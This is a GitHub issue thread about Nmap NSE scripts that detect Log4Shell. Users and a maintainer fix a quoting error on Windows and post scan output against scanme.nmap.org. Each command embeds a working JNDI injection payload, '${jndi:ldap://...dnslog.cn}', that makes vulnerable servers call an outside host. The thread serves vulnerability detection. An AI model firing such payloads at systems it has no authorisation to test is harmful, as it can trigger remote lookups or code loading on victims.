### ISSUE TITLE
NMAP error upon execution

### ISSUE THREAD

**Issue by JonWeatherhead** [Diverto/nse-log4shell#1]
No matter the target I use, whether a URL or an IP, I get the same error every time saying "Unable to split netmask from target expression".

for example
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell  '--script-args=log4shell.payload="${jndi:ldap://{{target}}.XXXX.dnslog.cn}"' -T4 -n -p0-65535 --script-timeout=1m xxx.xxx.xxx.xxx

**Comment by kost-div** [comment]
Thanks for reaching out.

You don't have to touch {{target}} only xxx.xxx.xxx.xxx. {{target}} will expand dynamically to current IP for easier detection. Here's full example on scanme.nmap.org:

```
nmap -v --script=http-log4shell,ssh-log4shell,imap-log4shell  '--script-args=log4shell.payload="${jndi:ldap://{{target}}.ej4jyb.dnslog.cn}"' -T4 -n -p22,80 --script-timeout=1m scanme.nmap.org
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 18:32 UTC
NSE: Loaded 3 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:32
Completed NSE at 18:32, 0.00s elapsed
Initiating Ping Scan at 18:32
Scanning scanme.nmap.org (45.33.32.156) [2 ports]
Completed Ping Scan at 18:32, 0.14s elapsed (1 total hosts)
Initiating Connect Scan at 18:32
Scanning scanme.nmap.org (45.33.32.156) [2 ports]
Discovered open port 22/tcp on 45.33.32.156
Discovered open port 80/tcp on 45.33.32.156
Completed Connect Scan at 18:32, 0.14s elapsed (2 total ports)
NSE: Script scanning 45.33.32.156.
Initiating NSE at 18:32
Completed NSE at 18:32, 3.86s elapsed
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.14s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 18:32
Completed NSE at 18:32, 0.00s elapsed
Read data files from: /opt/nmap-7.92/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.41 seconds
```

Let me know if you're still experiencing the problem. Would be good to get the full output. Feel free to censor IP.

**Comment by JonWeatherhead** [comment]
I tried similar but with my own "9kke6k.dnslog.cn".  I still get the error.  And then in my case, I also made my AV mad, perhaps it didn't like me making a call out to 9kke6k.dnslog.cn.  The only thing I see that is significantly different is that I am using an older NMAP version.  

nmap -v --script=http-log4shell,ssh-log4shell,imap-log4shell  '--script-args=log4shell.payload="${jndi:ldap://{{target}}.9kke6k.dnslog.cn}"' -T4 -n -p22,80 --script-timeout=1m scanme.nmap.org
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-13 13:36 Eastern Standard Time
NSE: Loaded 3 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Unable to split netmask from target expression: "'--script-args=log4shell.payload=${jndi:ldap://{{target}}.9kke6k.dnslog.cn}'"
Initiating Ping Scan at 13:36
Scanning scanme.nmap.org (45.33.32.156) [4 ports]
Completed Ping Scan at 13:36, 0.53s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:36
Scanning scanme.nmap.org (45.33.32.156) [2 ports]
Discovered open port 80/tcp on 45.33.32.156
Discovered open port 22/tcp on 45.33.32.156
Completed SYN Stealth Scan at 13:36, 0.10s elapsed (2 total ports)
NSE: Script scanning 45.33.32.156.
Initiating NSE at 13:36
Completed NSE at 13:37, 15.41s elapsed
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.089s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 18.51 seconds

**Comment by kost-div** [comment]
Oh, I see. You're using Windows. Examples given are for Linux. Therefore, you don't need to escape --script-args:

nmap -v --script=http-log4shell,ssh-log4shell,imap-log4shell --script-args=log4shell.payload="${jndi:ldap://{{target}}.9kke6k.dnslog.cn}" -T4 -n -p22,80 --script-timeout=1m scanme.nmap.org

**Comment by ghost** [comment]
First of all thanks to the team for this script :)

@kost-div This last example still wouldn't work on my Windows machine so I had to [escape the quotes](https://nmap.org/book/nse-usage.html#nse-args). Final command:

`nmap -v --script=http-log4shell,ssh-log4shell,imap-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://{{target}}.9kke6k.dnslog.cn}\"" -T4 -n -p22,80 --script-timeout=1m scanme.nmap.org`

**Comment by kost-div** [comment]
Thanks for your help. have provided the example in the README.
